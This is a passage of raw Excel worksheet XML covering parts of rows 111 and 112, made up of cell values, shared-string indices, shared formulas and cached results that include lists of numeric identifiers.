        <v>0.0</v>
      </c>
      <c r="BF111" s="102">
        <v>0.0</v>
      </c>
      <c r="BG111" s="102">
        <v>0.0</v>
      </c>
      <c r="BH111" s="102">
        <v>0.0</v>
      </c>
      <c r="BI111" s="102">
        <v>0.0</v>
      </c>
      <c r="BJ111" s="102">
        <v>0.0</v>
      </c>
      <c r="BK111" s="102">
        <v>0.0</v>
      </c>
      <c r="BL111" s="103">
        <f t="shared" si="167"/>
        <v>0</v>
      </c>
      <c r="BM111" s="103">
        <f t="shared" si="168"/>
        <v>0</v>
      </c>
      <c r="BN111" s="103">
        <f t="shared" si="169"/>
        <v>0</v>
      </c>
      <c r="BO111" s="103">
        <f t="shared" si="170"/>
        <v>0</v>
      </c>
      <c r="BP111" s="103">
        <f t="shared" si="171"/>
        <v>0</v>
      </c>
      <c r="BQ111" s="103">
        <f t="shared" si="172"/>
        <v>0</v>
      </c>
      <c r="BR111" s="103">
        <f t="shared" si="173"/>
        <v>0</v>
      </c>
      <c r="BS111" s="103">
        <f t="shared" si="174"/>
        <v>0</v>
      </c>
      <c r="BT111" s="103">
        <f t="shared" si="175"/>
        <v>0</v>
      </c>
      <c r="BU111" s="103">
        <f t="shared" si="75"/>
        <v>0</v>
      </c>
      <c r="BV111" s="103">
        <f t="shared" si="76"/>
        <v>0</v>
      </c>
      <c r="BW111" s="104" t="s">
        <v>1876</v>
      </c>
      <c r="BX111" s="104">
        <v>6.0</v>
      </c>
      <c r="BY111" s="104">
        <v>29.0</v>
      </c>
      <c r="BZ111" s="101" t="s">
        <v>12</v>
      </c>
      <c r="CA111" s="104" t="s">
        <v>1876</v>
      </c>
      <c r="CB111" s="104">
        <v>6.0</v>
      </c>
      <c r="CC111" s="104">
        <v>29.0</v>
      </c>
      <c r="CD111" s="104" t="s">
        <v>1876</v>
      </c>
      <c r="CE111" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CF111" s="104" t="str">
        <f t="shared" si="165"/>
        <v>2043343, 2044076, 2016141, 2021076, 2018959, 2025644</v>
      </c>
      <c r="CG111" s="104" t="s">
        <v>1876</v>
      </c>
      <c r="CH111" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CI111" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CJ111" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CK111" s="104">
        <v>0.0</v>
      </c>
      <c r="CL111" s="104">
        <v>0.0</v>
      </c>
      <c r="CM111" s="105">
        <v>169.0</v>
      </c>
      <c r="CN111" s="105">
        <v>13.0</v>
      </c>
      <c r="CO111" s="105">
        <v>15.0</v>
      </c>
      <c r="CP111" s="105">
        <v>0.0</v>
      </c>
      <c r="CQ111" s="105">
        <v>29.0</v>
      </c>
      <c r="CR111" s="105">
        <v>29.0</v>
      </c>
      <c r="CS111" s="105">
        <v>0.0</v>
      </c>
      <c r="CT111" s="105">
        <v>0.0</v>
      </c>
      <c r="CU111" s="105">
        <v>0.0</v>
      </c>
      <c r="CV111" s="105">
        <v>0.0</v>
      </c>
      <c r="CW111" s="105">
        <v>13.0</v>
      </c>
      <c r="CX111" s="105">
        <v>15.0</v>
      </c>
      <c r="CY111" s="105">
        <v>0.0</v>
      </c>
      <c r="CZ111" s="105">
        <v>29.0</v>
      </c>
      <c r="DA111" s="105">
        <v>29.0</v>
      </c>
      <c r="DB111" s="106">
        <f t="shared" si="176"/>
        <v>13</v>
      </c>
      <c r="DC111" s="106">
        <f t="shared" si="177"/>
        <v>13</v>
      </c>
      <c r="DD111" s="106">
        <f t="shared" si="178"/>
        <v>0</v>
      </c>
      <c r="DE111" s="106">
        <f t="shared" si="179"/>
        <v>15</v>
      </c>
      <c r="DF111" s="106">
        <f t="shared" si="180"/>
        <v>15</v>
      </c>
      <c r="DG111" s="106">
        <f t="shared" si="20"/>
        <v>0</v>
      </c>
      <c r="DH111" s="106">
        <f t="shared" si="181"/>
        <v>29</v>
      </c>
      <c r="DI111" s="106">
        <f t="shared" si="182"/>
        <v>29</v>
      </c>
      <c r="DJ111" s="106">
        <f t="shared" si="183"/>
        <v>0</v>
      </c>
      <c r="DK111" s="107">
        <f t="shared" si="104"/>
        <v>0</v>
      </c>
      <c r="DL111" s="106">
        <f t="shared" si="105"/>
        <v>0</v>
      </c>
      <c r="DM111" s="108" t="s">
        <v>1877</v>
      </c>
      <c r="DN111" s="108">
        <v>9.0</v>
      </c>
      <c r="DO111" s="108">
        <v>36.0</v>
      </c>
      <c r="DP111" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ111" s="108" t="s">
        <v>1877</v>
      </c>
      <c r="DR111" s="108">
        <v>9.0</v>
      </c>
      <c r="DS111" s="108">
        <v>36.0</v>
      </c>
      <c r="DT111" s="108" t="s">
        <v>1877</v>
      </c>
      <c r="DU111" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DV111" s="108" t="str">
        <f t="shared" si="166"/>
        <v>2043343, 2044076, 2016141, 2021076, 2018959, 2025644, 15935, 59597, 50447</v>
      </c>
      <c r="DW111" s="108" t="s">
        <v>1878</v>
      </c>
      <c r="DX111" s="108" t="s">
        <v>1879</v>
      </c>
      <c r="DY111" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DZ111" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA111" s="108">
        <v>0.0</v>
      </c>
      <c r="EB111" s="108">
        <v>0.0</v>
      </c>
      <c r="EC111" s="109">
        <v>168.0</v>
      </c>
      <c r="ED111" s="109">
        <v>16.0</v>
      </c>
      <c r="EE111" s="109">
        <v>19.0</v>
      </c>
      <c r="EF111" s="109">
        <v>7.0</v>
      </c>
      <c r="EG111" s="109">
        <v>29.0</v>
      </c>
      <c r="EH111" s="109">
        <v>36.0</v>
      </c>
      <c r="EI111" s="109">
        <v>0.0</v>
      </c>
      <c r="EJ111" s="109">
        <v>0.0</v>
      </c>
      <c r="EK111" s="109">
        <v>0.0</v>
      </c>
      <c r="EL111" s="109">
        <v>0.0</v>
      </c>
      <c r="EM111" s="109">
        <v>16.0</v>
      </c>
      <c r="EN111" s="109">
        <v>19.0</v>
      </c>
      <c r="EO111" s="109">
        <v>7.0</v>
      </c>
      <c r="EP111" s="109">
        <v>29.0</v>
      </c>
      <c r="EQ111" s="109">
        <v>36.0</v>
      </c>
      <c r="ER111" s="110">
        <f t="shared" si="184"/>
        <v>16</v>
      </c>
      <c r="ES111" s="110">
        <f t="shared" si="185"/>
        <v>16</v>
      </c>
      <c r="ET111" s="110">
        <f t="shared" si="186"/>
        <v>0</v>
      </c>
      <c r="EU111" s="110">
        <f t="shared" si="187"/>
        <v>19</v>
      </c>
      <c r="EV111" s="110">
        <f t="shared" si="188"/>
        <v>19</v>
      </c>
      <c r="EW111" s="110">
        <f t="shared" si="189"/>
        <v>0</v>
      </c>
      <c r="EX111" s="110">
        <f t="shared" si="190"/>
        <v>36</v>
      </c>
      <c r="EY111" s="110">
        <f t="shared" si="191"/>
        <v>36</v>
      </c>
      <c r="EZ111" s="110">
        <f t="shared" si="192"/>
        <v>0</v>
      </c>
      <c r="FA111" s="110">
        <f t="shared" si="106"/>
        <v>0</v>
      </c>
      <c r="FB111" s="110">
        <f t="shared" si="107"/>
        <v>0</v>
      </c>
      <c r="FC111" s="111" t="s">
        <v>1880</v>
      </c>
      <c r="FD111" s="111">
        <v>15.0</v>
      </c>
      <c r="FE111" s="111">
        <v>64.0</v>
      </c>
      <c r="FF111" s="101" t="s">
        <v>1881</v>
      </c>
      <c r="FG111" s="111" t="s">
        <v>1882</v>
      </c>
      <c r="FH111" s="111">
        <v>11.0</v>
      </c>
      <c r="FI111" s="111">
        <v>41.0</v>
      </c>
      <c r="FJ111" s="111" t="s">
        <v>1882</v>
      </c>
      <c r="FK111" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FL111" s="111" t="str">
        <f t="shared" si="155"/>
        <v>15935, 59597, 50447, 2043343, 2044076, 2016141, 2003595, 2021076, 2018959, 2025644, 2101200
</v>
      </c>
      <c r="FM111" s="111" t="s">
        <v>1883</v>
      </c>
      <c r="FN111" s="111" t="s">
        <v>1884</v>
      </c>
      <c r="FO111" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FP111" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ111" s="111">
        <v>0.0</v>
      </c>
      <c r="FR111" s="111">
        <v>0.0</v>
      </c>
      <c r="FS111" s="112">
        <v>165.0</v>
      </c>
      <c r="FT111" s="112">
        <v>24.0</v>
      </c>
      <c r="FU111" s="112">
        <v>41.0</v>
      </c>
      <c r="FV111" s="112">
        <v>7.0</v>
      </c>
      <c r="FW111" s="112">
        <v>57.0</v>
      </c>
      <c r="FX111" s="112">
        <v>64.0</v>
      </c>
      <c r="FY111" s="112">
        <v>0.0</v>
      </c>
      <c r="FZ111" s="112">
        <v>0.0</v>
      </c>
      <c r="GA111" s="112">
        <v>0.0</v>
      </c>
      <c r="GB111" s="112">
        <v>0.0</v>
      </c>
      <c r="GC111" s="112">
        <v>16.0</v>
      </c>
      <c r="GD111" s="112">
        <v>22.0</v>
      </c>
      <c r="GE111" s="112">
        <v>7.0</v>
      </c>
      <c r="GF111" s="112">
        <v>34.0</v>
      </c>
      <c r="GG111" s="112">
        <v>41.0</v>
      </c>
      <c r="GH111" s="113">
        <f t="shared" si="193"/>
        <v>24</v>
      </c>
      <c r="GI111" s="113">
        <f t="shared" si="194"/>
        <v>16</v>
      </c>
      <c r="GJ111" s="113">
        <f t="shared" si="195"/>
        <v>0</v>
      </c>
      <c r="GK111" s="113">
        <f t="shared" si="196"/>
        <v>41</v>
      </c>
      <c r="GL111" s="113">
        <f t="shared" si="197"/>
        <v>22</v>
      </c>
      <c r="GM111" s="113">
        <f t="shared" si="198"/>
        <v>0</v>
      </c>
      <c r="GN111" s="113">
        <f t="shared" si="199"/>
        <v>64</v>
      </c>
      <c r="GO111" s="113">
        <f t="shared" si="200"/>
        <v>41</v>
      </c>
      <c r="GP111" s="113">
        <f t="shared" si="201"/>
        <v>0</v>
      </c>
      <c r="GQ111" s="114">
        <f t="shared" si="108"/>
        <v>0</v>
      </c>
      <c r="GR111" s="113">
        <f t="shared" si="109"/>
        <v>0</v>
      </c>
      <c r="GS111" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT111" s="94" t="s">
        <v>1885</v>
      </c>
      <c r="GU111" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GV111" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GW111" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GX111" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY111" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ111" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA111" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB111" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC111" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD111" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HE111" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HF111" s="117" t="str">
        <f t="shared" si="66"/>
        <v>-</v>
      </c>
      <c r="HG111" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH111" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HI111" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ111" s="93" t="s">
        <v>12</v>
      </c>
      <c r="HK111" s="93" t="str">
        <f t="shared" si="51"/>
        <v>SI</v>
      </c>
      <c r="HL111" s="93">
        <v>168.0</v>
      </c>
      <c r="HM111" s="93">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="HN111" s="93">
        <v>0.0</v>
      </c>
      <c r="HO111" s="93">
        <v>0.0</v>
      </c>
      <c r="HP111" s="93">
        <v>0.0</v>
      </c>
      <c r="HQ111" s="118">
        <f t="shared" si="53"/>
        <v>0</v>
      </c>
      <c r="HR111" s="118">
        <f t="shared" si="54"/>
        <v>0</v>
      </c>
      <c r="HS111" s="118">
        <f t="shared" si="55"/>
        <v>0</v>
      </c>
      <c r="HT111" s="139" t="s">
        <v>12</v>
      </c>
      <c r="HU111" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV111" s="148" t="s">
        <v>1886</v>
      </c>
      <c r="HW111" s="119">
        <v>5.0</v>
      </c>
      <c r="HX111" s="119">
        <v>5.0</v>
      </c>
      <c r="HY111" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ111" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA111" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB111" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC111" s="120" t="str">
        <f t="shared" si="162"/>
        <v>86533, 54752, 39909, 599800, 52020</v>
      </c>
      <c r="ID111" s="120" t="s">
        <v>1887</v>
      </c>
      <c r="IE111" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IF111" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IG111" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH111" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II111" s="99" t="s">
        <v>1888</v>
      </c>
      <c r="IJ111" s="98" t="str">
        <f t="shared" si="56"/>
        <v>SI</v>
      </c>
      <c r="IK111" s="99">
        <v>167.0</v>
      </c>
      <c r="IL111" s="99">
        <v>1.0</v>
      </c>
      <c r="IM111" s="121">
        <f t="shared" si="159"/>
        <v>1</v>
      </c>
      <c r="IN111" s="122" t="s">
        <v>230</v>
      </c>
      <c r="IO111" s="98">
        <v>1.0</v>
      </c>
      <c r="IP111" s="123">
        <f t="shared" si="58"/>
        <v>1</v>
      </c>
      <c r="IQ111" s="118">
        <f t="shared" si="59"/>
        <v>1</v>
      </c>
      <c r="IR111" s="118">
        <f t="shared" si="60"/>
        <v>1</v>
      </c>
      <c r="IS111" s="124" t="s">
        <v>225</v>
      </c>
      <c r="IT111" s="127"/>
      <c r="IU111" s="127"/>
      <c r="IV111" s="127"/>
      <c r="IW111" s="127"/>
      <c r="IX111" s="127"/>
      <c r="IY111" s="127"/>
      <c r="IZ111" s="127"/>
      <c r="JA111" s="127"/>
      <c r="JB111" s="127"/>
      <c r="JC111" s="127"/>
      <c r="JD111" s="127"/>
      <c r="JE111" s="127"/>
      <c r="JF111" s="127"/>
      <c r="JG111" s="127"/>
      <c r="JH111" s="127"/>
      <c r="JI111" s="127"/>
      <c r="JJ111" s="127"/>
      <c r="JK111" s="127"/>
      <c r="JL111" s="127"/>
      <c r="JM111" s="127"/>
      <c r="JN111" s="127"/>
      <c r="JO111" s="127"/>
      <c r="JP111" s="127"/>
      <c r="JQ111" s="127"/>
      <c r="JR111" s="127"/>
      <c r="JS111" s="127"/>
      <c r="JT111" s="127"/>
      <c r="JU111" s="127"/>
      <c r="JV111" s="127"/>
      <c r="JW111" s="127"/>
      <c r="JX111" s="127"/>
      <c r="JY111" s="127"/>
      <c r="JZ111" s="127"/>
      <c r="KA111" s="127"/>
      <c r="KB111" s="127"/>
      <c r="KC111" s="127"/>
      <c r="KD111" s="127"/>
      <c r="KE111" s="127"/>
      <c r="KF111" s="127"/>
      <c r="KG111" s="127"/>
      <c r="KH111" s="127"/>
      <c r="KI111" s="127"/>
      <c r="KJ111" s="127"/>
      <c r="KK111" s="127"/>
      <c r="KL111" s="127"/>
      <c r="KM111" s="127"/>
      <c r="KN111" s="127"/>
      <c r="KO111" s="127"/>
      <c r="KP111" s="127"/>
      <c r="KQ111" s="127"/>
      <c r="KR111" s="127"/>
      <c r="KS111" s="127"/>
      <c r="KT111" s="127"/>
      <c r="KU111" s="127"/>
      <c r="KV111" s="127"/>
      <c r="KW111" s="127"/>
      <c r="KX111" s="127"/>
      <c r="KY111" s="127"/>
      <c r="KZ111" s="127"/>
      <c r="LA111" s="127"/>
      <c r="LB111" s="127"/>
      <c r="LC111" s="127"/>
      <c r="LD111" s="127"/>
      <c r="LE111" s="127"/>
      <c r="LF111" s="127"/>
      <c r="LG111" s="127"/>
      <c r="LH111" s="127"/>
      <c r="LI111" s="127"/>
      <c r="LJ111" s="127"/>
      <c r="LK111" s="127"/>
      <c r="LL111" s="127"/>
      <c r="LM111" s="127"/>
      <c r="LN111" s="127"/>
      <c r="LO111" s="127"/>
      <c r="LP111" s="127"/>
      <c r="LQ111" s="127"/>
      <c r="LR111" s="127"/>
      <c r="LS111" s="127"/>
      <c r="LT111" s="127"/>
      <c r="LU111" s="127"/>
      <c r="LV111" s="127"/>
      <c r="LW111" s="127"/>
      <c r="LX111" s="127"/>
      <c r="LY111" s="127"/>
      <c r="LZ111" s="127"/>
      <c r="MA111" s="127"/>
      <c r="MB111" s="127"/>
      <c r="MC111" s="127"/>
      <c r="MD111" s="127"/>
      <c r="ME111" s="127"/>
      <c r="MF111" s="127"/>
      <c r="MG111" s="127"/>
      <c r="MH111" s="127"/>
      <c r="MI111" s="127"/>
      <c r="MJ111" s="127"/>
      <c r="MK111" s="127"/>
      <c r="ML111" s="127"/>
      <c r="MM111" s="127"/>
      <c r="MN111" s="127"/>
      <c r="MO111" s="127"/>
      <c r="MP111" s="127"/>
      <c r="MQ111" s="127"/>
      <c r="MR111" s="127"/>
      <c r="MS111" s="127"/>
      <c r="MT111" s="127"/>
      <c r="MU111" s="127"/>
      <c r="MV111" s="127"/>
      <c r="MW111" s="127"/>
      <c r="MX111" s="127"/>
      <c r="MY111" s="127"/>
      <c r="MZ111" s="127"/>
      <c r="NA111" s="127"/>
      <c r="NB111" s="127"/>
      <c r="NC111" s="127"/>
      <c r="ND111" s="127"/>
      <c r="NE111" s="127"/>
      <c r="NF111" s="127"/>
      <c r="NG111" s="127"/>
      <c r="NH111" s="127"/>
      <c r="NI111" s="127"/>
      <c r="NJ111" s="127"/>
      <c r="NK111" s="127"/>
      <c r="NL111" s="127"/>
      <c r="NM111" s="127"/>
      <c r="NN111" s="127"/>
      <c r="NO111" s="127"/>
      <c r="NP111" s="127"/>
      <c r="NQ111" s="127"/>
      <c r="NR111" s="127"/>
      <c r="NS111" s="127"/>
      <c r="NT111" s="127"/>
      <c r="NU111" s="127"/>
      <c r="NV111" s="127"/>
      <c r="NW111" s="127"/>
      <c r="NX111" s="127"/>
      <c r="NY111" s="127"/>
    </row>
    <row r="112" ht="153.75" customHeight="1">
      <c r="B112" s="89" t="s">
        <v>292</v>
      </c>
      <c r="C112" s="90" t="s">
        <v>12</v>
      </c>
      <c r="D112" s="90" t="s">
        <v>293</v>
      </c>
      <c r="E112" s="90" t="s">
        <v>1889</v>
      </c>
      <c r="F112" s="90" t="s">
        <v>1890</v>
      </c>
      <c r="G112" s="90" t="s">
        <v>1891</v>
      </c>
      <c r="H112" s="90" t="s">
        <v>1892</v>
      </c>
      <c r="I112" s="92" t="s">
        <v>1893</v>
      </c>
      <c r="J112" s="92" t="s">
        <v>1894</v>
      </c>
      <c r="K112" s="92" t="s">
        <v>1895</v>
      </c>
      <c r="L112" s="93" t="s">
        <v>317</v>
      </c>
      <c r="M112" s="93">
        <v>26.0</v>
      </c>
      <c r="N112" s="93">
        <v>1.0</v>
      </c>
      <c r="O112" s="93">
        <v>0.0</v>
      </c>
      <c r="P112" s="93">
        <v>1.0</v>
      </c>
      <c r="Q112" s="93">
        <f t="shared" si="160"/>
        <v>1</v>
      </c>
      <c r="R112" s="93">
        <v>1.0</v>
      </c>
      <c r="S112" s="93">
        <v>0.0</v>
      </c>
      <c r="T112" s="94" t="s">
        <v>12</v>
      </c>
      <c r="U112" s="95" t="s">
        <v>219</v>
      </c>
      <c r="V112" s="96" t="s">
        <v>1194</v>
      </c>
      <c r="W112" s="96" t="s">
        <v>1896</v>
      </c>
      <c r="X112" s="132" t="s">
        <v>1897</v>
      </c>
      <c r="Y112" s="126" t="s">
        <v>1898</v>
      </c>
      <c r="Z112" s="132" t="s">
        <v>1899</v>
      </c>
      <c r="AA112" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB112" s="95" t="s">
        <v>224</v>
      </c>
      <c r="AC112" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AD112" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE112" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AF112" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AG112" s="98" t="s">
        <v>306</v>
      </c>
      <c r="AH112" s="99" t="s">
        <v>1900</v>
      </c>
      <c r="AI112" s="99" t="s">
        <v>228</v>
      </c>
      <c r="AJ112" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AK112" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AL112" s="100">
        <v>0.0</v>
      </c>
      <c r="AM112" s="100">
        <v>0.0</v>
      </c>
      <c r="AN112" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO112" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AP112" s="100">
        <v>0.0</v>
      </c>
      <c r="AQ112" s="100">
        <v>0.0</v>
      </c>
      <c r="AR112" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AS112" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT112" s="100" t="str">
        <f t="shared" si="164"/>
        <v>-</v>
      </c>
      <c r="AU112" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AV112" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AW112" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AX112" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY112" s="100">
        <v>0.0</v>
      </c>
      <c r="AZ112" s="100">
        <v>0.0</v>
      </c>
      <c r="BA112" s="102">
        <v>26.0</v>
      </c>
      <c r="BB112" s="102">
        <v>0.0</v>
      </c>
      <c r="BC112" s="102">
        <v>0.0</v>
      </c>
      <c r="BD112" s="102">
        <v>0.0</v>
      </c>
      <c r="BE112" s="102">
        <v>0.0</v>
      </c>
      <c r="BF112" s="102">
        <v>0.0</v>
      </c>
      <c r="BG112" s="102">
        <v>0.0</v>
      </c>
      <c r="BH112" s="102">
        <v>0.0</v>
      </c>
      <c r="BI112" s="102">
        <v>0.0</v>
      </c>
      <c r="BJ112" s="102">
        <v>0.0</v>
      </c>
      <c r="BK112" s="102">
        <v>0.0</v>
      </c>
      <c r="BL112" s="103">
        <f t="shared" si="167"/>
        <v>0</v>
      </c>
      <c r="BM112" s="103">
        <f t="shared" si="168"/>
        <v>0</v>
      </c>
      <c r="BN112" s="103">
        <f t="shared" si="169"/>
        <v>0</v>
      </c>
      <c r="BO112" s="103">
        <f t="shared" si="170"/>
        <v>0</v>
      </c>
      <c r="BP112" s="103">
        <f t="shared" si="171"/>
        <v>0</v>
      </c>
      <c r="BQ112" s="103">
        <f t="shared" si="172"/>
        <v>0</v>
      </c>
      <c r="BR112" s="103">
        <f t="shared" si="173"/>
        <v>0</v>
      </c>
      <c r="BS112" s="103">
        <f t="shared" si="174"/>
        <v>0</v>
      </c>
      <c r="BT112" s="103">
        <f t="shared" si="175"/>
        <v>0</v>
      </c>
      <c r="BU112" s="103">
        <f t="shared" si="75"/>
        <v>0</v>
      </c>
      <c r="BV112" s="103">
        <f t="shared" si="76"/>
        <v>0</v>
      </c>
      <c r="BW112" s="104" t="s">
        <v>12</v>
      </c>
      <c r="BX112" s="104">
        <v>0.0</v>
      </c>
      <c r="BY112" s="104">
        <v>0.0</v>
      </c>
      <c r="BZ112" s="101" t="s">
        <v>12</v>
      </c>
      <c r="CA112" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CB112" s="104">
        <v>0.0</v>
      </c>
      <c r="CC112" s="104">
        <v>0.0</v>
      </c>
      <c r="CD112" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CE112" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CF112" s="104" t="str">
        <f t="shared" si="165"/>
        <v>-</v>
      </c>
      <c r="CG112" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CH112" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CI112" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CJ112" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CK112" s="104">
        <v>0.0</v>
      </c>
      <c r="CL112" s="104">
        <v>0.0</v>
      </c>
      <c r="CM112" s="105">
        <v>26.0</v>
      </c>
      <c r="CN112" s="105">
        <v>0.0</v>
      </c>
      <c r="CO112" s="105">
        <v>0.0</v>
      </c>
      <c r="CP112" s="105">
        <v>0.0</v>
      </c>
      <c r="CQ112" s="105">
        <v>0.0</v>
      </c>
      <c r="CR112" s="105">
        <v>0.0</v>
      </c>
      <c r="CS112" s="105">
        <v>0.0</v>
      </c>
      <c r="CT112" s="105">
        <v>0.0</v>
      </c>
      <c r="CU112" s="105">
        <v>0.0</v>
      </c>
      <c r="CV112" s="105">
        <v>0.0</v>
      </c>
      <c r="CW112" s="105">
        <v>0.0</v>
      </c>
      <c r="CX112" s="105">
        <v>0.0</v>
      </c>
      <c r="CY112" s="105">
        <v>0.0</v>
      </c>
      <c r="CZ112" s="105">
        <v>0.0</v>
      </c>
      <c r="DA112" s="105">
        <v>0.0</v>
      </c>
      <c r="DB112" s="106">
        <f t="shared" si="176"/>
        <v>0</v>
      </c>
      <c r="DC112" s="106">
        <f t="shared" si="177"/>
        <v>0</v>
      </c>
      <c r="DD112" s="106">
        <f t="shared" si="178"/>
        <v>0</v>
      </c>
      <c r="DE112" s="106">
        <f t="shared" si="179"/>
        <v>0</v>
      </c>
      <c r="DF112" s="106">
        <f t="shared" si="180"/>
        <v>0</v>
      </c>
      <c r="DG112" s="106">
        <f t="shared" si="20"/>
        <v>0</v>
      </c>
      <c r="DH112" s="106">
        <f t="shared" si="181"/>
        <v>0</v>
      </c>
      <c r="DI112" s="106">
        <f t="shared" si="182"/>
        <v>0</v>
      </c>
      <c r="DJ112" s="106">
        <f t="shared" si="183"/>
        <v>0</v>
      </c>
      <c r="DK112" s="107">
        <f t="shared" si="104"/>
        <v>0</v>
      </c>
      <c r="DL112" s="106">
        <f t="shared" si="105"/>
        <v>0</v>
      </c>
      <c r="DM112" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DN112" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DO112" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DP112" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ112" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DR112" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DS112" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DT112" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DU112" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DV112" s="108" t="str">
        <f t="shared" si="166"/>
        <v>-</v>
      </c>
      <c r="DW112" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DX112" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DY112" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DZ112" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA112" s="108">
        <v>0.0</v>
      </c>
      <c r="EB112" s="108">
        <v>0.0</v>
      </c>
      <c r="EC112" s="109">
        <v>26.0</v>
      </c>
      <c r="ED112" s="109">
        <v>0.0</v>
      </c>
      <c r="EE112" s="109">
        <v>0.0</v>
      </c>
      <c r="EF112" s="109">
        <v>0.0</v>
      </c>
      <c r="EG112" s="109">
        <v>0.0</v>
      </c>
      <c r="EH112" s="109">
        <v>0.0</v>
      </c>
      <c r="EI112" s="109">
        <v>0.0</v>
      </c>
      <c r="EJ112" s="109">
        <v>0.0</v>
      </c>
      <c r="EK112" s="109">
        <v>0.0</v>
      </c>
      <c r="EL112" s="109">
        <v>0.0</v>
      </c>
      <c r="EM112" s="109">
        <v>0.0</v>
      </c>
      <c r="EN112" s="109">
        <v>0.0</v>
      </c>
      <c r="EO112" s="109">
        <v>0.0</v>
      </c>
      <c r="EP112" s="109">
        <v>0.0</v>
      </c>
      <c r="EQ112" s="109">
        <v>0.0</v>
      </c>
      <c r="ER112" s="110">
        <f t="shared" si="184"/>
        <v>0</v>
      </c>
      <c r="ES112" s="110">
        <f t="shared" si="185"/>
        <v>0</v>
      </c>
      <c r="ET112" s="110">
        <f t="shared" si="186"/>
        <v>0</v>
      </c>
      <c r="EU112" s="110">
        <f t="shared" si="187"/>
        <v>0</v>
      </c>
      <c r="EV112" s="110">
        <f t="shared" si="188"/>
        <v>0</v>
      </c>
      <c r="EW112" s="110">
        <f t="shared" si="189"/>
        <v>0</v>
      </c>
      <c r="EX112" s="110">
        <f t="shared" si="190"/>
        <v>0</v>
      </c>
      <c r="EY112" s="110">
        <f t="shared" si="191"/>
        <v>0</v>
      </c>
      <c r="EZ112" s="110">
        <f t="shared" si="192"/>
        <v>0</v>
      </c>
      <c r="FA112" s="110">
        <f t="shared" si="106"/>
        <v>0</v>
      </c>
      <c r="FB112" s="110">
        <f t="shared" si="107"/>
        <v>0</v>
      </c>
      <c r="FC112" s="111" t="s">
        <v>229</v>
      </c>
      <c r="FD112" s="111">
        <v>2.0</v>
      </c>
      <c r="FE112" s="111">
        <v>11.0</v>
      </c>
      <c r="FF112" s="101" t="s">
        <v>229</v>
      </c>
      <c r="FG112" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FH112" s="111">
        <v>0.0</v>
      </c>
      <c r="FI112" s="111">
        <v>0.0</v>
      </c>
      <c r="FJ112" s="111" t="s">
        <v>229</v>
      </c>
      <c r="FK112" s="111" t="s">
        <v>229</v>
      </c>
      <c r="FL112" s="111" t="str">
        <f t="shared" si="155"/>
        <v>2002752, 2002749</v>
      </c>
      <c r="FM112" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FN112" s="111" t="s">
        <v>229</v>
      </c>
      <c r="FO112" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FP112" s="111" t="s">
        <v>12</v>
      </c>
